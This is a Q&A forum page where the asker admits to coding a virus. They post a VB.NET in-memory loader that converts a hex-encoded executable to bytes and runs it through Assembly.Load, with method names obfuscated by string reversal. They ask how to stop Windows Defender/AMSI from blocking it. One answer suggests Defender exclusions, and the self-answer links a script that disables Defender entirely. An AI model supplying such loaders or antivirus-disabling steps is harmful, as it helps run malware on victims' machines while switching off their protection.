CODEWITHSUNDEEP
vb.netvisual-studiomemoryvirus
Sorry IwontTell
Sorry IwontTell

Reputation: 502

Operation did not complete successfully because the file contains a virus or potentially unwanted software. (Exception from HRESULT: 0x800700E1)

Guys I have problem while coding in vb.net in visual studio. Here's my code which will convert .EXE file Hex to byte and directly run from memory.

Imports System.Linq,System.Reflection
              Public Module Module1
                     Public Sub Main()
                                 Dim n As String = "4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
                                 Dim q1 As Object = Assembly.Load(HexToByte(n))
                                 Dim d2 As Object = CallByName(q1, "EntryPoint", CallType.Method)
                                 Dim E3 As Object = CallByName(d2, StrReverse("ek" & "ovni"), CallType.Get, StrReverse("oN") & "th" & "ing", Nothing)

                     End Sub
                     Public Function HexToByte(ByVal str As String) As Byte()
                                 Dim xData As Byte() = str.Split(" "c).Select(Function(n) Convert.ToByte(Convert.ToInt32(n, 16))).ToArray()
                                 Return xData
                     End Function
             End Module

When I debug it using F5 key, it shows full message as below:

System.BadImageFormatException: 
'Could not load file or assembly '32256 bytes loaded from Project1, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null' or one of its dependencies. 
An attempt was made to load a program with an incorrect format.'

And also

Inner Exeception
BadImageFormatException: Operation did not complete successfully because the file contains a virus or potentially unwanted software. 
(Exception from HRESULT: 0x800700E1)

Guys as these messages states that I am coding a virus and also it is true.
But I have using this code a lot of times but it didn't return any exception.
But now it is doesn't allows me. How to fix that thing ???

Upvotes: 5

Views: 11048

Answers (2)

Kris Stern
Kris Stern

Reputation: 1350

I just run into the same problem while executing some golang code on Windows 10. It turns out that Windows Security has been treating the temporary file in something like C:\Users\<user-name>\AppData\Local\Temp\go-buildxxxxxxxxx\b00x\exe\app.exe for running my app.go script as a virus or potentially unwanted software. One quick fix is to add exclusion via Windows Security by extension, but I am not sure if this is best practice though because this would weaken your security.

Note the above "x" represent digits that I am trying to hide to keep things generic.

Upvotes: 2

Sorry IwontTell
Sorry IwontTell

Reputation: 502

As it mentions that it contains a virus,
So probably AMSI(Win Defender Component) is blocking the virus from being running,

As this error message also occurs in powershell when executing malicious command,
And hence AMSI stops it, info taken from 0x00-0x00.github.io enter image description here

Run this VBS script to disable defender completely,
https://github.com/NYAN-x-CAT/Bypass-Windows-Defender-VBS/blob/master/script.vbs

Upvotes: 0

Related Questions